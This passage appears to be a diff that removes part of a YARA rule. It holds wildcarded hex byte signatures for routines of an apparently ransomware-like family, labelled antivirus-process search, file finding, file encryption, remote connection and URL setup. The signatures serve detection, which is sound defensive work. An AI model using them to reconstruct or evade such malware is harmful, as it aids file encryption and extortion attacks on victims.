-            ?? ?? 68 ?? ?? ?? ?? F3 0F 7F 07 6A ?? F3 0F 6F 45 ?? 89 7D ?? F3 0F 7F 47 ?? FF D6
-            F3 0F 6F 45 ?? 68 ?? ?? ?? ?? 89 45 ?? F3 0F 7F 00 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50
-            57 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 68 ??
-            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ??
-            ?? 6A ?? FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 0F 57 C0 66 0F 13 45 ??
-            8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 6A ?? 8B D8
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF D6 8B
-            3D ?? ?? ?? ?? 33 F6 33 C9 89 45 ?? 89 4D ?? EB ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 68 ??
-            ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
-            ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F 42 F1 01 03 83 53 ?? ?? 8B 45 ?? 89 45 ?? 89 45 ?? A8 ?? 74 ?? 8B FF 40 A8 ?? 75
-            ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 45 ?? FF 75
-            ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 45 ??
-            F7 D9 6A ?? 83 D0 ?? 6A ?? F7 D8 50 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
-            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? BE ?? ?? ?? ?? 89 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 85 F6 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 75 ?? 85 C9 75 ?? 51 8D 45 ?? 50
-            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75
-            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ??
-            ?? ?? ?? 8B 03 8B 73 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF D7 68 ?? ?? ?? ?? 6A ??
-            FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? FF
-            75 ?? FF D7 5F 8B D6 8B C3 5E 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes_v5 = {
-            8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
-            D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB ?? 56 33 C9 89
-            5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F
-            85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D 58 ?? 8D 46 ??
-            50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 37 FF 15
-            ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D 0C 41 8B 45 ??
-            81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 33 C9 66 39 08
-            74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 68 ??
-            ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 85 DB 75 ??
-            68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files_v5 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
-            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
-            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
-            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
-            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
-            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$crypt_files_v5 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
-            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? FF 75
-            ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? EB ??
-            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 75 ?? 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15
-            ?? ?? ?? ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 21 7D ?? 21 7D ?? 41 89 45 ??
-            8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ??
-            89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A
-            ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ??
-            83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33
-            C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
-            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ??
-            8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86
-            ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D
-            ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ??
-            ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ??
-            E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
-            85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ??
-            ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ??
-            ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45
-            ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF
-            70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
-            8B E5 5D C3
-        }
-		$remote_connection_v5 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
-            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
-            E5 5D C2
-        }
-		$remote_connection_v5_0_1 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
-            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$url_parameters_setup_v5 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
-            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$url_parameters_setup_v5_0_1 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
-            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$crypt_files_v5_0_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
-            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
-            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
-            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
-            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
-            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
-            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
-            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
-            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
-            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
-            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
-            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
-            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
-            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
-            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
-            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
-            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
-            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
-            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
-            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
-            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
-            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
-            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files_v5_0_1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
-            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
-            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
-            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
-            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
-            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
